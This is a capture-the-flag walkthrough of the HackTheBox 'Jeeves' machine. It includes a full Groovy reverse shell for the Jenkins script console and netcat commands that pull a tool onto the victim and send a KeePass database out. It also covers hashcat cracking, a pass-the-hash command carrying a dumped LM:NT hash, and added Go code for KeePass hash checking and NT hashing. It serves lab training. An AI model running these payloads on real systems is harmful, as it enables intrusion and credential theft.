Musings from a mediocre hacker

Jeeves-HackTheBox

The name Jeeves refers to the Jenkins server we will eventually be exploiting. Super fun recap box!


Starting off by scanning ports with nmap.

There is at least one webserver. Fuzzing directories, running nikto etc. against it turned up nothing of real interest.
Check out the second webserver spotted in the nmap scan, a Jetty instance. Run gobuster against it until it finds askjeeves, which is a Jenkins install.

Stumble across the script console (Manage Jenkins > Script Console, served at /script under the Jenkins root, so /askjeeves/script here). It runs arbitrary Groovy on the Jenkins host as the account the Jenkins service runs under.

Research ways to exploit this: exploit Jenkins with a Groovy script.
https://book.hacktricks.xyz/pentesting/pentesting-web/jenkins#code-execution

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#groovy

// Groovy reverse shell for the Jenkins script console (PayloadsAllTheThings cheat sheet).
// Set host to the attacking machine's IP and start a listener there first (nc -lnvp 1234).
// The shell runs as the Jenkins service account, which on this box is kohsuke.
String host = "";
int port = 1234;
String cmd = "cmd.exe";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
// Pump process output to the socket and socket input to the process until either side closes.
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();

We get a user shell as kohsuke.
After a little bit of recon we come across CEH.kdbx.

The .kdbx extension marks a KeePass password database. Before we can try for the password we have to download the file to our local machine.

I achieved this by downloading a netcat executable to the user shell from a python http server hosted on my own machine. The box cannot reach out to GitHub, so the file has to come from us:

powershell wget "http://localip:8000/nc.exe" -outfile nc.exe

Then listen on your local machine and push the file from the victim. netcat needs a host and a port on both ends; any free port works, 4444 here:

nc -lnvp 4444 > CEH.kdbx          (local machine)
nc.exe localip 4444 < CEH.kdbx    (victim)

Compare the file size or hash on both sides before spending time on cracking; a truncated transfer yields a hash that never cracks.

We need a password to open the kdbx file. Why don't we crack it?
I used this article as guidance; the main points summarized are:

https://www.rubydevices.com.au/blog/how-to-hack-keepass

Download keepass2john (it ships with John the Ripper) and run it on the kdbx file:

./keepass2john CEH.kdbx > CEH.hash

Remove the name of the keepass database from the start of the new hash file: keepass2john prefixes the line with "CEH:", and hashcat expects the line to begin with $keepass$.
Use hashcat to crack the hash. Mode 13400 is KeePass, -a 0 is a dictionary attack so a wordlist is required (rockyou.txt here), and -w 1 keeps the workload low:

./hashcat -m 13400 -a 0 -w 1 CEH.hash rockyou.txt

moonshine1 is the password to the keepass file.
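What hashcat is actually doing with that line, as an added example that is not part of the original writeup and not keepass2john's or hashcat's code: a Go program that parses a keepass2john-style $keepass$*2* line (version, transform rounds, cipher id, master seed, transform seed, IV, expected start bytes, first 32 bytes of ciphertext), runs the KDBX 3.x key schedule for a candidate password (SHA256 twice, AES-256-ECB with the transform seed for the stated number of rounds, SHA256, then SHA256 over the master seed and that), and decrypts the first two ciphertext blocks with AES-CBC to compare against the expected start bytes. The real CEH.kdbx header is not reproduced here, so makeSampleHash constructs a line with fixed seeds and the password moonshine1; the type and function names are this example's own, and keyfile variants of the hash line are not handled.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"strconv"
	"strings"
)

// kdbxHash is what keepass2john extracts from a KeePass 2.x (KDBX 3.x) header and
// what hashcat -m 13400 works from: seeds, IV, the 32 StreamStartBytes the decrypted
// payload must begin with, and the first 32 bytes of the encrypted payload.
type kdbxHash struct {
	Rounds                                                   uint64
	MasterSeed, TransformSeed, IV, ExpectedStart, Ciphertext []byte
}

// parseKeepassHash accepts "CEH:$keepass$*2*..." or the bare "$keepass$*2*..." form.
// Fields: version, rounds, cipher id, master seed, transform seed, IV,
// expected start bytes, ciphertext.
func parseKeepassHash(line string) (*kdbxHash, error) {
	line = strings.TrimSpace(line)
	if i := strings.Index(line, "$keepass$"); i > 0 {
		line = line[i:] // drop the "dbname:" prefix keepass2john prepends
	}
	f := strings.Split(line, "*")
	if len(f) != 9 || f[0] != "$keepass$" || f[1] != "2" {
		return nil, fmt.Errorf("not a KeePass 2.x password-only hash line")
	}
	rounds, err := strconv.ParseUint(f[2], 10, 64)
	if err != nil {
		return nil, err
	}
	raw := make([][]byte, 5)
	for i, want := range []int{32, 32, 16, 32, 32} { // byte length of each hex field
		if raw[i], err = hex.DecodeString(f[4+i]); err != nil || len(raw[i]) != want {
			return nil, fmt.Errorf("field %d: bad hex or length", 4+i)
		}
	}
	return &kdbxHash{rounds, raw[0], raw[1], raw[2], raw[3], raw[4]}, nil
}

// masterKey runs the KDBX 3.x key schedule for a password-only database:
// SHA256(SHA256(pw)), AES-256-ECB with the transform seed for Rounds rounds,
// SHA256 of that, then SHA256(masterSeed || transformedKeyHash).
func masterKey(password string, h *kdbxHash) ([]byte, error) {
	pw := sha256.Sum256([]byte(password))
	tk := sha256.Sum256(pw[:])
	block, err := aes.NewCipher(h.TransformSeed)
	if err != nil {
		return nil, err
	}
	for i := uint64(0); i < h.Rounds; i++ {
		block.Encrypt(tk[:16], tk[:16]) // ECB: both 16-byte halves encrypted independently
		block.Encrypt(tk[16:], tk[16:])
	}
	tkHash := sha256.Sum256(tk[:])
	mk := sha256.Sum256(append(append([]byte{}, h.MasterSeed...), tkHash[:]...))
	return mk[:], nil
}

// checkPassword decrypts the first 32 ciphertext bytes with AES-256-CBC and
// compares them to StreamStartBytes; a match means the password is right.
func checkPassword(password string, h *kdbxHash) (bool, error) {
	mk, err := masterKey(password, h)
	if err != nil {
		return false, err
	}
	block, err := aes.NewCipher(mk)
	if err != nil {
		return false, err
	}
	plain := make([]byte, 32)
	cipher.NewCBCDecrypter(block, h.IV).CryptBlocks(plain, h.Ciphertext)
	return bytes.Equal(plain, h.ExpectedStart), nil
}

// makeSampleHash builds a constructed keepass2john-style line for a database
// protected by password. Seeds are fixed so the run is deterministic; the real
// CEH.kdbx header is not reproduced here.
func makeSampleHash(password string) string {
	h := &kdbxHash{6000, bytes.Repeat([]byte{0x11}, 32), bytes.Repeat([]byte{0x22}, 32),
		bytes.Repeat([]byte{0x33}, 16), bytes.Repeat([]byte{0x44}, 32), make([]byte, 32)}
	mk, _ := masterKey(password, h)
	block, _ := aes.NewCipher(mk)
	cipher.NewCBCEncrypter(block, h.IV).CryptBlocks(h.Ciphertext, h.ExpectedStart)
	return fmt.Sprintf("CEH:$keepass$*2*%d*0*%x*%x*%x*%x*%x", h.Rounds,
		h.MasterSeed, h.TransformSeed, h.IV, h.ExpectedStart, h.Ciphertext)
}

func main() {
	h, err := parseKeepassHash(makeSampleHash("moonshine1"))
	if err != nil {
		panic(err)
	}
	for _, c := range []string{"password", "jenkins", "moonshine1"} { // toy wordlist
		ok, _ := checkPassword(c, h)
		fmt.Printf("%-12s %v\n", c, ok)
	}
}
```

Stripping the "CEH:" prefix in parseKeepassHash is the same edit the article has you make by hand. The 6000 AES rounds per guess are the whole cost of a KeePass dictionary attack, which is why hashcat's GPU implementation matters and why this loop is only for understanding, not for cracking.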

In the keepass file, under the entry titled "Backup stuff", we find not a password but a hash: an LM:NT pair in the form a SAM dump produces.
From here I got stuck for a while. While researching I found the tool pth-winexe, which authenticates over SMB with the NT hash itself, so the hash never needs to be cracked. Read the docs and run it to get admin:

pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe

(--system asks winexe to run the command as SYSTEM rather than as the authenticating user.)

We now have a root (SYSTEM) shell!
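What that "Backup stuff" value is and why pth-winexe can use it unchanged, as an added example that is not from the original writeup: the value is an LM:NT pair. The Go below splits the pair, flags the LM half as the well-known hash of the empty string (meaning no LM hash is stored, so there is nothing weak to crack there), and shows how the NT half is computed: MD4 over the UTF-16LE password with no salt and no iteration count, which is exactly what makes pass-the-hash possible, since the NT hash is the NTLM authentication secret. Go's standard library has no MD4, so the block carries its own RFC 1320 implementation; ntHash, describeHashPair and the "password" comparison are this example's names and constructed input. Nothing here says what password the page's NT hash corresponds to.

```go
package main

import (
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"math/bits"
	"strings"
	"unicode/utf16"
)

// md4 is a from-scratch RFC 1320 MD4; Go's standard library does not ship one.
func md4(msg []byte) [16]byte {
	a, b, c, d := uint32(0x67452301), uint32(0xefcdab89), uint32(0x98badcfe), uint32(0x10325476)
	f := func(x, y, z uint32) uint32 { return (x & y) | (^x & z) }
	g := func(x, y, z uint32) uint32 { return (x & y) | (x & z) | (y & z) }
	h := func(x, y, z uint32) uint32 { return x ^ y ^ z }
	s1, s2, s3 := [4]int{3, 7, 11, 19}, [4]int{3, 5, 9, 13}, [4]int{3, 9, 11, 15}

	// Padding: 0x80, zeros up to 56 mod 64, then the message bit length as 64-bit LE.
	var lenBytes [8]byte
	binary.LittleEndian.PutUint64(lenBytes[:], uint64(len(msg))*8)
	msg = append(append([]byte{}, msg...), 0x80)
	for len(msg)%64 != 56 {
		msg = append(msg, 0)
	}
	msg = append(msg, lenBytes[:]...)

	for off := 0; off < len(msg); off += 64 {
		var x [16]uint32
		for i := range x {
			x[i] = binary.LittleEndian.Uint32(msg[off+4*i:])
		}
		aa, bb, cc, dd := a, b, c, d
		// Each step updates a, then the registers rotate so the next step works on
		// what the RFC calls d, c, b in turn.
		for i := 0; i < 16; i++ { // round 1: message words in order
			a = bits.RotateLeft32(a+f(b, c, d)+x[i], s1[i%4])
			a, b, c, d = d, a, b, c
		}
		for i := 0; i < 16; i++ { // round 2: words 0,4,8,12,1,5,9,13,...
			a = bits.RotateLeft32(a+g(b, c, d)+x[(i%4)*4+i/4]+0x5a827999, s2[i%4])
			a, b, c, d = d, a, b, c
		}
		for i := 0; i < 16; i++ { // round 3: words in 4-bit-reversed order 0,8,4,12,...
			a = bits.RotateLeft32(a+h(b, c, d)+x[bits.Reverse8(uint8(i))>>4]+0x6ed9eba1, s3[i%4])
			a, b, c, d = d, a, b, c
		}
		a, b, c, d = a+aa, b+bb, c+cc, d+dd
	}
	var out [16]byte
	for i, v := range [4]uint32{a, b, c, d} {
		binary.LittleEndian.PutUint32(out[4*i:], v)
	}
	return out
}

// ntHash is MD4 over the UTF-16LE password: no salt and no iteration count, so a
// dumped NT hash is directly replayable as the NTLM secret (pass the hash).
func ntHash(password string) string {
	var buf []byte
	for _, u := range utf16.Encode([]rune(password)) {
		buf = append(buf, byte(u), byte(u>>8))
	}
	sum := md4(buf)
	return hex.EncodeToString(sum[:])
}

const emptyLMHash = "aad3b435b51404eeaad3b435b51404ee" // LM hash of the empty string

// describeHashPair splits an "LM:NT" pair as dumped from the SAM and reports whether
// the LM half is the empty-string value, i.e. no LM hash is stored for the account.
func describeHashPair(pair string) (lm, nt string, lmEmpty bool, err error) {
	parts := strings.Split(strings.TrimSpace(pair), ":")
	if len(parts) != 2 || len(parts[0]) != 32 || len(parts[1]) != 32 {
		return "", "", false, fmt.Errorf("expected 32-hex:32-hex, got %q", pair)
	}
	lm, nt = strings.ToLower(parts[0]), strings.ToLower(parts[1])
	return lm, nt, lm == emptyLMHash, nil
}

func main() {
	// the value from the "Backup stuff" entry in CEH.kdbx
	lm, nt, lmEmpty, err := describeHashPair("aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00")
	if err != nil {
		panic(err)
	}
	fmt.Printf("LM %s (empty-string LM, nothing to crack: %v)\nNT %s\n", lm, lmEmpty, nt)
	// constructed comparison: what the NT half looks like for a known password
	fmt.Println("NT(\"password\") =", ntHash("password"))
}
```

The NT half is what pth-winexe feeds into the NTLM exchange in place of a password; that is the whole reason the hash did not need cracking before the SYSTEM shell.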

The Administrator has an hm.txt file that only redirects to the actual file: the flag is stored in an NTFS alternate data stream of hm.txt named root.txt, which a plain directory listing or type does not show (the /R switch of dir lists a file's streams).

get-content .\hm.txt -stream root.txt

and we get the root flag :)